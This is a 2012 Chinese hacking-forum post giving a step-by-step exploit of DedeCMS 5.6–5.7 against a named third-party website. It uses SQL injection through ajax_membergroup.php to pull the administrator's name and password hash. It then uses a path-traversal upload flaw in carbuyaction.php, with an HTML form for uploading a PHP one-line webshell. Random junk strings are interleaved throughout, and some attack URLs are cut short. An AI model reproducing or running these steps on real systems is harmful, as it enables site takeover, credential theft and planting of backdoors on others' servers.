中国网络渗透测试联盟
标题:
dedecms5.6-5.7注入与上传漏洞利用
[打印本页]
作者:
admin
时间:
2012-9-13 10:56
标题:
dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
/ x* O. k/ `& B" t; c. O U0 y8 N
这站
http://www.political-security.com/
" L8 Z2 X2 p0 } K9 |
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
, W) ^* J7 U u \, a
www.political-security.com/data/mysql_error_trace.inc
爆后台
" a }4 D0 O/ T' Q, B7 e
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
5 a" V& V o4 a2 ?0 M- }
然后写上语句
6 h" n) f1 ] R9 t# t
查看管理员帐号
! P6 N) g! x( C3 \2 d3 g7 _
http://www.political-security.co ... &membergroup=@`
# ^% |) s2 e# k. S c4 ] Z
9 Z4 Q7 V. G1 W7 X1 Y* J4 B
admin
, R8 D3 }2 W0 _
- D" i# Q, F/ {& F. w n
查看管理员密码
4 {1 y! I6 g. @
http://www.political-security.co ... &membergroup=@`
( g' o" A3 @0 `& h
$ u: Y& f$ X- e! o" }
8d29b1ef9f8c5a5af429
{: A T9 t" s+ ]! z, S3 D& |( F
: e) ?( T. d3 t
查看管理员密码
% f; H" @, F6 I' n% R
. w8 X. s% O j, x$ f
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
1 }7 a- O4 @, o( d
. [+ Z! h/ ~+ i- q/ V& @' a
8d2
0 j) f" u0 v8 \+ e4 m5 B2 [
9b1ef9f8c5a5af42
; f. L0 y& t0 L( e
9
3 R4 u* x' o n
8 ?( k3 _, W7 [& R4 G# f
cmd5没解出来 只好测试第二个方法
* o+ T9 u4 `1 r$ @: `
% {, Y2 a3 e% i4 t2 n
5 u+ ~" x% d: ^! ?" d- Z5 A
②上传漏洞:
0 Y. H, _3 ]& ~) S5 ~9 {$ J
- \/ V+ j+ m' d: A
只要登陆会员中心,然后访问页面链接
- B3 {# F/ f( j
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
9 y$ g9 ^/ u9 R5 O+ c: X5 {
2 Q4 A% O7 ?& K* k2 x& K: T+ n
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
/ e( ?6 ^3 ^2 x( Z% w7 M
p, i: A) Z* M2 n% z! G
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
& v' @: Z* W. G5 N }, u
5 U8 L+ I$ m) O; a z
<form action="http://
www.political-security.com
/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
/ e6 S1 W6 K8 l3 C$ ?
或者
5 A" k0 L- ?+ g
即可上传成功
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2